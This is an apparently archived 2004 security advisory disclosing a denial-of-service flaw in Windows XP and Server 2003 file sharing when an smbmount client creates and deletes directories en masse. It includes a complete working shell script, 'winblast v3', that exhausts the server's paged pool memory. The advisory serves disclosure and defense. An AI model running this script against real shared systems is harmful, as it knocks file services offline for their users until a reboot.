home *** CD-ROM | disk | FTP | other *** search
- Announced: 2004-02-02
- Type: Denial of Service Attack on Windows
- Impact: smbmount can stop Windows from sharing files
- Writer: Daniel Kabs, Germany (daniel.kabs@gmx.de)
- Credits: Thanks to Steve Ladjabi (steve.ladjabi@web.de)
-
- Contents:
- 1. Abstract
- 2. Affected Systems
- 3. Attack Setup
- 4. Symptoms
- 5. Workaround
-
-
- 1. Abstract
-
- A security vulnerability of "Windows XP" and "Windows 2003
- Server" has been found. Theses systems are open to a denial
- of service attack. If they share folders to a Unix client
- that is using smbmount (part of the Samba suite), any user
- on the client who has permissions to create directories on
- the mounted share can stop the Windows system from serving
- files. The attack induces a memory shortage on the Windows
- system by creating directories in a special way.
-
- 2. Affected Systems
-
- This denial of service attack has been carried out
- successfully against
- - Microsoft Windows XP Professional, Service Pack 1
- - Microsoft Windows Server 2003
-
- Microsoft Windows 2000 Prof. and earlier versions of
- Windows are not affected by this attack.
-
- 3. Attack Setup
-
- The attack was carried out successfully using
- - "Debian Linux", smbmount 3.0.0beta2
- - "Suse Linux 8.2", smbmount version 2.2.2
- as Unix clients
-
- The Windows system shares a folder. The Unix client mounts
- the share using smbmount. A user on the Unix client has
- write/create permissions to it the shared folder.
-
- The user on the client creates and deletes a lot of
- directories on the mounted share using the following
- script:
-
- #!/bin/sh
- # winblast v3 - DoS on WinXP, Win2003Srv
- # 2003-12-04 Steve Ladjabi
-
- count=0
-
- # using 'pathcount' directories
- pathcount=1000
-
- echo running \'winblast v3\' with $pathcount files in loop
- ...
-
- while [ 1 ]; do
- p=$((pathcount*2-1))
- stop=$((pathcount-1))
- while [ "$p" != "$stop" ]; do
- dirname=wbst$p
- # delete old directory if it exists, exit on any error
- if [ -d $dirname ]; then
- rmdir $dirname || exit 3
- fi;
-
- # generating directory and exit on any error
- mkdir $dirname || exit 1
- p=$((p-1))
- count=$((count+1))
- done;
- echo $count directories generated ...
- done;
- #-- end --
-
- The script will create 1000 directories and then takes
- turns deleting and re-creating them. There will be no
- more than those 1000 directories at any time!
-
- Every time a directory is created, the Windows system
- allocates paged pool memory. This memory is not freed
- although the directory gets deleted.
-
- After having created and deleted 3.5 millions directories,
- the Windows system's paged pool memory has been depleted
- and it denies access to the share. One tested Windows XP
- system managed to take 5.8 millions directories until it
- stopped serving. This happens about 4 hours after the
- attack was started.
-
- 4. Symptoms
-
- When the Windows system suddenly fails, it ceases serving,
- i.e. users can not access files nor list directory contents
- any more from the client. Any client will have lost its
- access the the share.
-
- On the Windows system the event log shows an error with
- event id 2020.
-
- Additionally, the Administrator of the Windows system can
- neither unshare the folder nor kill the session due to the
- lack of memory resources. Trying to open the managment
- console will result in error messages to this effect.
- Executing the command "net share /delete" fails due to
- the memory shortage.
-
- The only way to get the Windows system working again is
- to reboot it.
-
- Putting more RAM in the maching running Windows will not
- help as the paged pool memory is limited to 343MB. (See
- MS KB article Q312362).
-
- 5. Workaround
-
- Administrator should schedule a daily reboot of the
- Windows system.
-
